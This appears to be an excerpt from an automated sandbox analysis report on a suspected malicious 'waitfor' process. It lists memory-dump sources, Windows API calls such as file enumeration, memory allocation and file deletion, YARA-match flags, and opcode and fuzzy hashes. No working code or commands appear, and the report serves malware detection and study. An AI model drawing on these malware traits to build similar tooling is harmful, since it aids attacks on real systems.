                                                                                                                • String ID: !~$"z$$$*$-$$0$5$8xyF$@0$F$G'$M$O$af$f$m$s$v$yF$|$*$@$a
                                                                                                                • API String ID: 0-1104866437
                                                                                                                • Opcode ID: fa64b429fff650e51f0a7acf9d5dd1069ab5e60d8bf8720501680845ef1f6f25
                                                                                                                • Instruction ID: 8b9a8295e4b97d33548cc376b40c873e87ec4af5f8da18d28adc86058e790bfe
                                                                                                                • Opcode Fuzzy Hash: fa64b429fff650e51f0a7acf9d5dd1069ab5e60d8bf8720501680845ef1f6f25
                                                                                                                • Instruction Fuzzy Hash: 67427DB0D06228CBEB68CF44C9947DDBBB6FF45308F1081D9C509AA290DBB55AC9CF56
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0082CC74
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0082CCAF
                                                                                                                • FindClose.KERNELBASE(?), ref: 0082CCBA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 0cf4fac8b3c0f3d65cb5c9fbdc11fc9a33a5724dce5cef26e65f56e313b34315
                                                                                                                • Instruction ID: 823926ee341b0830a8c2e105cca67d7aeacbb903a2abc57ab2a2c253b9c014e0
                                                                                                                • Opcode Fuzzy Hash: 0cf4fac8b3c0f3d65cb5c9fbdc11fc9a33a5724dce5cef26e65f56e313b34315
                                                                                                                • Instruction Fuzzy Hash: 3E316FB1A003587BDB20DBA4DC85FFF777CEF84704F144559BA09E6181DA70AA848BA1
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00839848
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 3bef618b96a2b972b0ecd4014bd13abf0775ca340cb735c52f419bd135e5a95e
                                                                                                                • Instruction ID: 94cfdd2fd34e02258ff9caa6d554d8499c796caf2fd56918b6f18f6388c0dd3c
                                                                                                                • Opcode Fuzzy Hash: 3bef618b96a2b972b0ecd4014bd13abf0775ca340cb735c52f419bd135e5a95e
                                                                                                                • Instruction Fuzzy Hash: AD31D2B5A01608AFCB14DF98D981EEFB7B9EF8C710F108219F919A7344D770A9118BA5
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00839990
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 7b2bb91b12148946a7475c37ddf9922fca461394f54bde61227a64b974e9941a
                                                                                                                • Instruction ID: a36ad7977dae1170029d302fa38e1853088afe2c7348158d58013c7a1ae518d8
                                                                                                                • Opcode Fuzzy Hash: 7b2bb91b12148946a7475c37ddf9922fca461394f54bde61227a64b974e9941a
                                                                                                                • Instruction Fuzzy Hash: 4D31F9B5A00208AFDB14DF98D881EDFB7B9EF88710F108219FD19E7340D770A9158BA5
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(0082231E,?,0083858F,00000000,00000004,00003000,?,?,?,?,?,0083858F,0082231E,0083BA81,0083858F,45C75651), ref: 00839C52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: dd2310b82a309aade04c16b49507b91864c37ad5edb7370376e069164ab0fe86
                                                                                                                • Instruction ID: 55755b6750fca7b91e3b020e14f96a1207774d9906435b8de3cc83d5d40d7487
                                                                                                                • Opcode Fuzzy Hash: dd2310b82a309aade04c16b49507b91864c37ad5edb7370376e069164ab0fe86
                                                                                                                • Instruction Fuzzy Hash: 07212BB5A00648AFDB14DF98DC41EEFB7B9EF88710F008119FA19A7241D770A9158BA6
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: a12b89487e862537019f0aabac514e5e028b2ee599d2fad5dc8d9f1ba142960f
                                                                                                                • Instruction ID: 82ca6d940ad1e75afacd1d7b6d34da5fe0e7dfa52e70bcffa626c6f0ae167bbf
                                                                                                                • Opcode Fuzzy Hash: a12b89487e862537019f0aabac514e5e028b2ee599d2fad5dc8d9f1ba142960f
                                                                                                                • Instruction Fuzzy Hash: EC11A3716006047FD610EBA8DC02FEB736CEF85710F008109FA19E7281E7717A1587E6
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00839A74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction ID: 6d060992032a8035706dc39b2b6aab27f3e9e4e6a9c583c44b10b806e0d1d0f0
                                                                                                                • Opcode Fuzzy Hash: 39452f28565ae4620622cddfb96962eeb8732a42bf1b94520a18f89472db538c
                                                                                                                • Instruction Fuzzy Hash: 5FE08C322002047BC620EA5EEC01F9BB76CEFC5B20F008419FA0CE7242C671B90587FA
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                                                • Instruction ID: 09b50227317fcc0b00ceb69003c66df74e199cd130a21333526ad171af365a19
                                                                                                                • Opcode Fuzzy Hash: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                                                • Instruction Fuzzy Hash: 889002616015004261507159480441660059BE5305396C225A0555670C8618D955A26A
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                                                • Instruction ID: 3a088205638b0d737d516f981772ec1ee5442226376222bcfb3841d772319372
                                                                                                                • Opcode Fuzzy Hash: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                                                • Instruction Fuzzy Hash: BD90023160580012B1507159488455640059BE4305B56C121E0425674C8A14DA566362
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                                                • Instruction ID: e954dc9a62869d5acce5c8a5faf8ca377f8c6780586c1450130cb14759bf2726
                                                                                                                • Opcode Fuzzy Hash: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                                                • Instruction Fuzzy Hash: 8F90023120148802F1207159840475A00058BD4305F5AC521A4425778D8695D9917122
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                                                • Instruction ID: 2ebf845620946ae95afda4dce2bef4df7a94836508425cd97327b55d42969960
                                                                                                                • Opcode Fuzzy Hash: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                                                • Instruction Fuzzy Hash: 9A90023120140842F11071594404B5600058BE4305F56C126A0125774D8615D9517522
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                                                • Instruction ID: c99258c2b026cc0c6a7741ab432a7e37724669227056482998b67190fc2d6e4c
                                                                                                                • Opcode Fuzzy Hash: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                                                • Instruction Fuzzy Hash: FA90023120140402F1107599540865600058BE4305F56D121A5025675EC665D9917132
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                                                • Instruction ID: c286157c7f259d502d8100b6c2497a4f589f700f61c028ffcff190424eccb69d
                                                                                                                • Opcode Fuzzy Hash: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                                                • Instruction Fuzzy Hash: 7390022130140003F150715954186164005DBE5305F56D121E0415674CD915D9566223
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                                                • Instruction ID: f6a588346f9271fb85ac93d01977c8c40445da2f371cdcd472252316c4e51bd4
                                                                                                                • Opcode Fuzzy Hash: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                                                • Instruction Fuzzy Hash: 9390022921340002F1907159540861A00058BD5206F96D525A0016678CC915D9696322
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                                                • Instruction ID: cf788a138988e4b519366ce642e34164e6be60bbb069a560b1830b2ac4a2e370
                                                                                                                • Opcode Fuzzy Hash: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                                                • Instruction Fuzzy Hash: 2890023120140413F1217159450471700098BD4245F96C522A0425678D9656DA52B122
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                                                • Instruction ID: c4f9a9e9bc8cda713ea5bef28835e30bff6817fa7b444b5dc11189daab241e7a
                                                                                                                • Opcode Fuzzy Hash: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                                                • Instruction Fuzzy Hash: 55900221242441527555B159440451740069BE4245796C122A1415A70C8526E956E622
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                                                • Instruction ID: 432fa674191338cc366870597c62bda3df091ec8a6c2706863de63039936c829
                                                                                                                • Opcode Fuzzy Hash: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                                                • Instruction Fuzzy Hash: 3690026120180403F1507559480461700058BD4306F56C121A2065675E8A29DD517136
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                                                • Instruction ID: bbfce90d39726ab3e231d49c1058be8873f2955c135eb3379b7b6ba3e1cf0789
                                                                                                                • Opcode Fuzzy Hash: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                                                • Instruction Fuzzy Hash: 9F90022160140502F11171594404626000A8BD4245F96C132A1025675ECA25DA92B132
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                                                • Instruction ID: 8a0c87c75761a7ae36abc10059158c9c49aa6bde81d60bc92a643ae53a2491ae
                                                                                                                • Opcode Fuzzy Hash: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                                                • Instruction Fuzzy Hash: 5E90026134140442F11071594414B160005CBE5305F56C125E1065674D8619DD527127
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                                                • Instruction ID: e24d4509c6d78deee3a843ca1bdcb78497efed686a9557c552386409164fef25
                                                                                                                • Opcode Fuzzy Hash: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                                                • Instruction Fuzzy Hash: 34900221211C0042F21075694C14B1700058BD4307F56C225A0155674CC915D9616522
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                                                • Instruction ID: 923eabafbb8ea3c1d38c466959bfdf1fa47541231404c60837d08dddfa7eb121
                                                                                                                • Opcode Fuzzy Hash: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                                                • Instruction Fuzzy Hash: E0900221601400426150716988449164005AFE5215756C231A0999670D8559D9656666
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                                                • Instruction ID: 4fb0b8e2b17bc898ec493d8bfad1a16aaee50c1a4172d484c326bd67c3373b2d
                                                                                                                • Opcode Fuzzy Hash: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                                                • Instruction Fuzzy Hash: 84900225221400022155B559060451B04459BDA355396C125F14176B0CC621D9656322
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                                                • Instruction ID: 1261eb02577ab0633d2fa8567f1c2c4390e6b65ab731f0e44b1ba60622b784aa
                                                                                                                • Opcode Fuzzy Hash: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                                                • Instruction Fuzzy Hash: E4900225211400032115B559070451700468BD9355356C131F1016670CD621D9616122
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                                                • Instruction ID: 7ad64ad574930a4fbcf3af8c3b4868c2c56b3d067bdda7f8c8bcb15689b3f2f4
                                                                                                                • Opcode Fuzzy Hash: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                                                • Instruction Fuzzy Hash: C790026120240003611571594414626400A8BE4205B56C131E10156B0DC525D9917126
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
